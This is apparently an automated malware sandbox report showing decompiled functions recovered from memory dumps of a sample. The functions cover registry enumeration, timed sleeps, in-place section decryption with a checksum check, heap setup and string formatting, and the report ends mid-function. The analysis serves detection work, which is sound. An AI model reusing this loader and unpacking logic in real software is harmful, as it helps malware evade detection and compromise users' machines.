Function 02F64FFA, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 02F65057
SysAllocString.OLEAUT32(02F6A6F4), ref: 02F6509B
SysFreeString.OLEAUT32(00000000), ref: 02F650AF
SysFreeString.OLEAUT32(00000000), ref: 02F650BD

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: dbf8c3c3ef2028932b264c1caffb42b5c35eabbacfafa4d83c156128fd870cba
Instruction ID: ff7e40b0085a99dee40052ce0b9fe208377587a712084a0619f60c825ff49272
Opcode Fuzzy Hash: dbf8c3c3ef2028932b264c1caffb42b5c35eabbacfafa4d83c156128fd870cba
Instruction Fuzzy Hash: 70310E7690020AFFCB04DF98D8C89AE7BB9FF48784B50841AEA16A7251E771D541CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02F69575, Relevance: 6.1, APIs: 4, Instructions: 98
registrysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F69575(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E02F658BE(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32); // executed
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E02F6147E(_v28);
							goto L17;
						}
						_t42 = E02F6A642(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E02F6147E(_v24);
						_v20 = _v16;
						_t47 = E02F658BE(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x2f6d26c, 0) == 0x102);
				goto L16;
			}

0x02f69575
0x02f6958f
0x02f69592
0x02f69595
0x02f69598
0x02f6959b
0x02f695a1
0x02f695a5
0x02f6967f
0x02f69683
0x02f69683
0x02f695ae
0x02f695b5
0x02f695ba
0x02f695bf
0x02f69674
0x02f69677
0x00000000
0x02f6967d
0x02f695c5
0x02f695c8
0x02f695cf
0x02f695d9
0x02f695e2
0x02f695e8
0x02f695f0
0x02f69628
0x02f69662
0x02f69668
0x02f6966a
0x02f6966a
0x02f6966c
0x02f6966f
0x00000000
0x02f6966f
0x02f6963d
0x02f69642
0x02f69646
0x00000000
0x00000000
0x00000000
0x02f69646
0x02f695f5
0x02f69604
0x00000000
0x00000000
0x02f69609
0x02f69612
0x02f69615
0x02f6961a
0x02f6961f
0x02f695fa
0x02f695fa
0x00000000
0x02f695fa
0x02f69623
0x00000000
0x02f69623
0x02f695f7
0x00000000
0x02f69648
0x02f69655
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,02F6553C,?), ref: 02F6959B

Part of subcall function 02F658BE: RtlAllocateHeap.NTDLL(00000000,-00000008,02F61C51), ref: 02F658CA

RegEnumKeyExA.KERNELBASE(?,?,?,02F6553C,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,02F6553C), ref: 02F695E2
WaitForSingleObject.KERNEL32(00000000,?,?,?,02F6553C,?,02F6553C,?,?,?,?,?,02F6553C,?), ref: 02F6964F
RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,02F6553C,?), ref: 02F69677

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateCloseEnumHeapObjectOpenSingleWait
String ID:
API String ID: 3664505660-0
Opcode ID: 4874c1a73226368df631bf287bd8586cba479132a56a6a1bafda8d1ab1e00a4e
Instruction ID: aabe3ca595a7d270884a48f27f2431fa24c728dabf0dd6bfed6a73404a0b697c
Opcode Fuzzy Hash: 4874c1a73226368df631bf287bd8586cba479132a56a6a1bafda8d1ab1e00a4e
Instruction Fuzzy Hash: 6A313872D00259ABCF21ABA5CC88DFEFAB9EB44790F104566E661B3250D3B50A50DF91

Uniqueness

Uniqueness Score: -1.00%

Function 01511B6F, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95
memoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E01511B6F(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t42;
				void* _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed int _t61;
				intOrPtr _t63;
				intOrPtr _t78;
				void* _t79;

				_t78 =  *0x1514130;
				_t42 = E01511C8A(_t78,  &_v24,  &_v16);
				_v20 = _t42;
				if(_t42 == 0) {
					asm("sbb ebx, ebx");
					_t61 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t79 = _t78 + _v24;
					_v40 = _t79;
					_t49 = VirtualAlloc(0, _t61 << 0xc, 0x3000, 4); // executed
					_v28 = _t49;
					if(_t49 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t61 <= 0) {
							_t50 =  *0x1514140;
						} else {
							_t63 = _a4;
							_t53 = _t49 - _t79;
							_t13 = _t63 + 0x15151a2; // 0x15151a2
							_v32 = _t53;
							_v36 = _t53 + _t13;
							_v12 = _t79;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("rol edx, cl");
								E01511908(_v12 + _t53, _v12, (_v52 ^ _v48) + _v24 + _a4);
								_t50 =  *_v36 +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								_v12 = _v12 + 0x1000;
								 *0x1514140 = _t50;
								if(_v8 >= _t61) {
									break;
								}
								_t53 = _v32;
							}
						}
						if(_t50 != 0x59935a40) {
							_v20 = 0xc;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}

0x01511b76
0x01511b86
0x01511b8b
0x01511b90
0x01511ba5
0x01511bac
0x01511bb1
0x01511bc2
0x01511bc5
0x01511bcb
0x01511bd0
0x01511c7a
0x01511bd6
0x01511bd6
0x01511bdc
0x01511c42
0x01511bde
0x01511bde
0x01511be1
0x01511be3
0x01511beb
0x01511bee
0x01511bf1
0x01511bf9
0x01511c04
0x01511c05
0x01511c06
0x01511c15
0x01511c1e
0x01511c28
0x01511c2b
0x01511c2e
0x01511c35
0x01511c3d
0x00000000
0x00000000
0x01511bf6
0x01511bf6
0x01511c3f
0x01511c4c
0x01511c61
0x01511c4e
0x01511c57
0x01511c5c
0x01511c72
0x01511c72
0x01511c81
0x01511c87

APIs

VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,00000000,?,-00000008,-00000008), ref: 01511BC5
memcpy.NTDLL(?,?,-00000008,?,?,?,?,?,?,?,?,015111FF,-00000008), ref: 01511C57
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 01511C72

Strings

Dec 1 2020, xrefs: 01511BFC

Memory Dump Source

Source File: 00000000.00000002.457064738.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true

Associated: 00000000.00000002.457074162.0000000001515000.00000040.00000001.sdmp Download File
Associated: 00000000.00000002.457082559.0000000001517000.00000040.00000001.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Dec 1 2020
API String ID: 4010158826-3539646581
Opcode ID: d3f7263479de6341ab727b8afd0b85b6bfacfb70f12d7b9b03c784546be1b4a0
Instruction ID: 71590e6306f49f9b8baac487c761165211c6bdbddd3da894767d122924b06308
Opcode Fuzzy Hash: d3f7263479de6341ab727b8afd0b85b6bfacfb70f12d7b9b03c784546be1b4a0
Instruction Fuzzy Hash: 7F313D71D0061AEBEB12DFA8D8C1BEEBBB5BF48304F104165EA11BB244D771AA05DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02F654AC, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E02F654AC(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E02F64F1F(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E02F65749(_t23);
						}
					}
					return _t38;
				}
				_t26 = E02F69138(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x2f6d2a8, 1, 0,  *0x2f6d340);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E02F69575(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E02F6A642(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E02F6568A(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E02F672F2( &_v32, _t39);
					goto L13;
				}
			}

0x02f654ac
0x02f654b9
0x02f654bf
0x02f654c0
0x02f654c1
0x02f654c2
0x02f654c3
0x02f654c7
0x02f654ce
0x02f654d3
0x02f654d7
0x02f6555f
0x02f6555f
0x02f65562
0x02f65564
0x02f6556c
0x02f65572
0x02f65575
0x02f65575
0x02f65572
0x02f65580
0x02f65580
0x02f654e3
0x02f654ea
0x02f654ec
0x02f654ec
0x02f65503
0x02f65507
0x02f6550a
0x02f65515
0x02f6551c
0x02f6551c
0x02f65525
0x02f65529
0x02f65537
0x02f6552b
0x02f6552b
0x02f6552c
0x02f6552d
0x02f6552e
0x02f6552f
0x02f65530
0x02f65530
0x02f6553c
0x02f6553f
0x02f65543
0x02f65545
0x02f65545
0x02f6554c
0x00000000
0x02f6554e
0x02f6554e
0x02f6555b
0x00000000
0x02f6555b

APIs

CreateEventA.KERNEL32(02F6D2A8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730), ref: 02F654FD
SetEvent.KERNEL32(00000000), ref: 02F6550A
Sleep.KERNELBASE(00000BB8), ref: 02F65515
CloseHandle.KERNEL32(00000000), ref: 02F6551C

Part of subcall function 02F69575: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,02F6553C,?), ref: 02F6959B
Part of subcall function 02F69575: RegEnumKeyExA.KERNELBASE(?,?,?,02F6553C,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,02F6553C), ref: 02F695E2
Part of subcall function 02F69575: WaitForSingleObject.KERNEL32(00000000,?,?,?,02F6553C,?,02F6553C,?,?,?,?,?,02F6553C,?), ref: 02F6964F
Part of subcall function 02F69575: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,02F6553C,?), ref: 02F69677

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
String ID:
API String ID: 891522397-0
Opcode ID: 98e6480582d292438d11cd697dd52a39d8819b0c60e9fdaf945b2ff9bd377315
Instruction ID: 888fc307f7601949baac525ab8e4df0d1577e9725b55a89828779465a99c602f
Opcode Fuzzy Hash: 98e6480582d292438d11cd697dd52a39d8819b0c60e9fdaf945b2ff9bd377315
Instruction Fuzzy Hash: 9A212F72D00119ABCB20BFE5D88C9BEB7AAEB447D8B458465EB52F7200D774DE418F60

Uniqueness

Uniqueness Score: -1.00%

Function 02F61295, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E02F61295(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E02F658BE(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16); // executed
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x02f612a1
0x02f612a5
0x02f612a6
0x02f612a7
0x02f612a9
0x02f612ab
0x02f612ae
0x02f612b3
0x02f6134a
0x02f61351
0x02f61351
0x02f612bc
0x02f612c3
0x02f612d3
0x02f612d3
0x02f612d9
0x02f612db
0x02f612e0
0x02f612e9
0x02f612ef
0x02f612f4
0x02f612ff
0x02f61303
0x02f61305
0x02f61306
0x02f6130f
0x02f61313
0x02f61324
0x02f61315
0x02f6131a
0x02f6131f
0x02f6132e
0x02f6132e
0x02f61303
0x02f61334
0x02f6133a
0x02f6133a
0x02f61343
0x02f61348
0x02f61348
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 02F612C3
lstrlenW.KERNEL32(?), ref: 02F612F9
memcpy.NTDLL(00000000,?,?,?), ref: 02F6131A
SysFreeString.OLEAUT32(?), ref: 02F6132E

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 5bfe06a42687bfaf12b235f39ba328e368c286c9ea508a095ab5121b8f2da0d6
Instruction ID: 97b1d6c6e94106e2b32ffd16882a7739cb600a4615390d4c07431f1dc4ee0456
Opcode Fuzzy Hash: 5bfe06a42687bfaf12b235f39ba328e368c286c9ea508a095ab5121b8f2da0d6
Instruction Fuzzy Hash: 76212C75D0120AFFCB11DFA4C9899AEBBB9FF48284B144169EA56E7310E730DA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02F690A1, Relevance: 6.0, APIs: 4, Instructions: 38
sleepmemorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F690A1(signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _t5;
				void* _t7;
				void* _t10;
				void* _t13;
				void* _t14;
				void* _t15;
				signed int _t16;
				signed int _t22;

				_t16 = __edx;
				_t5 = HeapCreate(0, 0x400000, 0); // executed
				 *0x2f6d238 = _t5;
				if(_t5 == 0) {
					_t14 = 8;
					return _t14;
				}
				 *0x2f6d1a8 = GetTickCount();
				_t7 = E02F66A7F(_a4);
				if(_t7 == 0) {
					do {
						_t22 = SwitchToThread() + 8;
						_t10 = E02F61C04(_a4, _t22);
						Sleep(0x20 + _t22 * 4); // executed
					} while (_t10 == 1);
					if(E02F69511(_t15) != 0) {
						 *0x2f6d260 = 1; // executed
					}
					_t13 = E02F64908(_t16); // executed
					return _t13;
				}
				return _t7;
			}

0x02f690a1
0x02f690aa
0x02f690b0
0x02f690b7
0x02f690bb
0x00000000
0x02f690bb
0x02f690c8
0x02f690cd
0x02f690d4
0x02f690d8
0x02f690e4
0x02f690e8
0x02f690f7
0x02f690fd
0x02f6910b
0x02f6910d
0x02f6910d
0x02f69117
0x00000000
0x02f69117
0x02f6911c

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,02F66F11,?), ref: 02F690AA
GetTickCount.KERNEL32 ref: 02F690BE
SwitchToThread.KERNEL32(?,00000001,?), ref: 02F690D8
Sleep.KERNELBASE(00000000,-00000008,?,00000001,?), ref: 02F690F7

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: CountCreateHeapSleepSwitchThreadTick
String ID:
API String ID: 377297877-0
Opcode ID: d54b90d1a5cf11d0c4209da8b7433c19d273176eeaac2ab71530b6c37449f7c9
Instruction ID: 68a1a844b2888c1c1a12a690b01278b09fdbf654c03ac3b9ea0f0e493ec56675
Opcode Fuzzy Hash: d54b90d1a5cf11d0c4209da8b7433c19d273176eeaac2ab71530b6c37449f7c9
Instruction Fuzzy Hash: EDF09631E84309BBEB107B749D4CB7EBAA5EF45BD5F100826EA99D7240EBB4C410CA61

Uniqueness

Uniqueness Score: -1.00%

Function 02F668CF, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F668CF() {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t51;

				_v12 = 0;
				_t23 = E02F69138(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x2f6d2a4; // 0xb3a5a8
				_t4 = _t24 + 0x2f6ede0; // 0x3aa9388
				_t5 = _t24 + 0x2f6ed88; // 0x4f0053
				_t26 = E02F61B13( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x2f6d2a4; // 0xb3a5a8
						_t11 = _t32 + 0x2f6edd4; // 0x3aa937c
						_t48 = _t11;
						_t12 = _t32 + 0x2f6ed88; // 0x4f0053
						_t51 = E02F65FCB(_t11, _t12, _t11);
						_t58 = _t51;
						if(_t51 != 0) {
							_t35 =  *0x2f6d2a4; // 0xb3a5a8
							_t13 = _t35 + 0x2f6ea59; // 0x30314549
							if(E02F675E7(_t48, _t58, _v8, _t51, _t13, 0x14) == 0) {
								_t60 =  *0x2f6d25c - 6;
								if( *0x2f6d25c <= 6) {
									_t42 =  *0x2f6d2a4; // 0xb3a5a8
									_t15 = _t42 + 0x2f6ec3a; // 0x52384549
									E02F675E7(_t48, _t60, _v8, _t51, _t15, 0x13);
								}
							}
							_t38 =  *0x2f6d2a4; // 0xb3a5a8
							_t17 = _t38 + 0x2f6ee18; // 0x3aa93c0
							_t18 = _t38 + 0x2f6edf0; // 0x680043
							_t45 = E02F61BC1(_v8, 0x80000001, _t51, _t18, _t17);
							HeapFree( *0x2f6d238, 0, _t51);
						}
					}
					HeapFree( *0x2f6d238, 0, _v16);
				}
				_t53 = _v8;
				if(_v8 != 0) {
					E02F6568A(_t53);
				}
				return _t45;
			}

0x02f668df
0x02f668e2
0x02f668e9
0x02f668eb
0x02f668eb
0x02f668ee
0x02f668f3
0x02f668fa
0x02f66907
0x02f6690c
0x02f66910
0x02f6691e
0x02f6692c
0x02f66930
0x02f669c1
0x02f669c1
0x02f66936
0x02f66936
0x02f6693b
0x02f6693b
0x02f66942
0x02f6694e
0x02f66950
0x02f66952
0x02f66954
0x02f6695b
0x02f6696d
0x02f6696f
0x02f66976
0x02f66978
0x02f6697f
0x02f6698a
0x02f6698a
0x02f66976
0x02f6698f
0x02f66994
0x02f6699b
0x02f669b9
0x02f669bb
0x02f669bb
0x02f66952
0x02f669cd
0x02f669cd
0x02f669cf
0x02f669d4
0x02f669d6
0x02f669d6
0x02f669e1

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03AA9388,00000000,?,7519F710,00000000,7519F730), ref: 02F6691E
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,03AA93C0,?,00000000,30314549,00000014,004F0053,03AA937C), ref: 02F669BB
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02F69C10), ref: 02F669CD

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 1cae92898b668252dff47cfde15c89b403e29308e3dd140d1b1d6d2aad424174
Instruction ID: 3193467a1a7512f506d4e0a287f2a0e81caad5301cdbbca474e3ca7bf87d900d
Opcode Fuzzy Hash: 1cae92898b668252dff47cfde15c89b403e29308e3dd140d1b1d6d2aad424174
Instruction Fuzzy Hash: AC318D36A00109AFDB11EBA4DC8CEAABBBDEB487C4F060465FA05AB110D7709A14DB60

Uniqueness

Uniqueness Score: -1.00%

Function 02F69F11, Relevance: 4.6, APIs: 3, Instructions: 77
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E02F69F11(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t19;
				void* _t25;
				void* _t26;
				void* _t31;
				void* _t37;
				void* _t41;
				intOrPtr _t43;
				void* _t44;

				_t37 = __edx;
				_t33 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t43 =  *0x2f6d2a4; // 0xb3a5a8
				_push(0x800);
				_push(0);
				_push( *0x2f6d238);
				_t1 = _t43 + 0x2f6e791; // 0x6976612e
				_t44 = _t1;
				if( *0x2f6d24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t31 = 8;
						L7:
						if(_t31 != 0) {
							L10:
							 *0x2f6d24c =  *0x2f6d24c + 1;
							L11:
							return _t31;
						}
						_t46 = _a4;
						_t41 = _v8;
						 *_a16 = _a4;
						 *_a20 = E02F67CF7(_a4, _t41); // executed
						_t19 = E02F660CF(_t41, _t41, _t46); // executed
						if(_t19 != 0) {
							 *_a8 = _t41;
							 *_a12 = _t19;
							if( *0x2f6d24c < 5) {
								 *0x2f6d24c =  *0x2f6d24c & 0x00000000;
							}
							goto L11;
						}
						_t31 = 0xbf;
						E02F66106();
						RtlFreeHeap( *0x2f6d238, 0, _t41); // executed
						goto L10;
					}
					_t25 = E02F6514F(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t14);
					L5:
					_t31 = _t25;
					goto L7;
				}
				_t26 = RtlAllocateHeap(); // executed
				if(_t26 == 0) {
					goto L6;
				}
				_t25 = E02F61754(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t26); // executed
				goto L5;
			}

0x02f69f11
0x02f69f11
0x02f69f14
0x02f69f15
0x02f69f1f
0x02f69f26
0x02f69f2b
0x02f69f2d
0x02f69f33
0x02f69f33
0x02f69f39
0x02f69f61
0x02f69f79
0x02f69f7b
0x02f69f7c
0x02f69f7e
0x02f69fbc
0x02f69fbc
0x02f69fc2
0x02f69fc8
0x02f69fc8
0x02f69f80
0x02f69f86
0x02f69f89
0x02f69f98
0x02f69f9a
0x02f69fa1
0x02f69fd5
0x02f69fda
0x02f69fdc
0x02f69fde
0x02f69fde
0x00000000
0x02f69fdc
0x02f69fa3
0x02f69fa8
0x02f69fb6
0x00000000
0x02f69fb6
0x02f69f70
0x02f69f75
0x02f69f75
0x00000000
0x02f69f75
0x02f69f3b
0x02f69f43
0x00000000
0x00000000
0x02f69f52
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 02F69F3B

Part of subcall function 02F61754: GetTickCount.KERNEL32 ref: 02F61768
Part of subcall function 02F61754: wsprintfA.USER32 ref: 02F617B8
Part of subcall function 02F61754: wsprintfA.USER32 ref: 02F617D5
Part of subcall function 02F61754: wsprintfA.USER32 ref: 02F61801
Part of subcall function 02F61754: HeapFree.KERNEL32(00000000,?), ref: 02F61813
Part of subcall function 02F61754: wsprintfA.USER32 ref: 02F61834
Part of subcall function 02F61754: HeapFree.KERNEL32(00000000,?), ref: 02F61844
Part of subcall function 02F61754: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02F61872
Part of subcall function 02F61754: GetTickCount.KERNEL32 ref: 02F61883

RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 02F69F59
RtlFreeHeap.NTDLL(00000000,?,?,?,02F69C62,00000002,?,?,?,?), ref: 02F69FB6

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$wsprintf$AllocateFree$CountTick
String ID:
API String ID: 1676223858-0
Opcode ID: 2f7b7472c7729ec0988a00ab94582d50e0e2979a44083f4fb9d2644fd06de5f9
Instruction ID: 214d5677e3426c40fd2dd7b07d0ee5ad60d70ac427eddb95d7657c30192017d4
Opcode Fuzzy Hash: 2f7b7472c7729ec0988a00ab94582d50e0e2979a44083f4fb9d2644fd06de5f9
Instruction Fuzzy Hash: 64218E76740208EFDB009F54DC4CAAA77ACEB487C4F014416FA12DB200DB70E955CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01511EB4, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E01511EB4(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				long _v16;
				signed int _v20;
				signed int _t31;
				long _t33;
				int _t34;
				signed int _t35;
				signed int _t42;
				void* _t50;
				void* _t51;
				signed int _t54;

				_v12 = _v12 & 0x00000000;
				_t42 =  *(__eax + 6) & 0x0000ffff;
				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v20 = _t42;
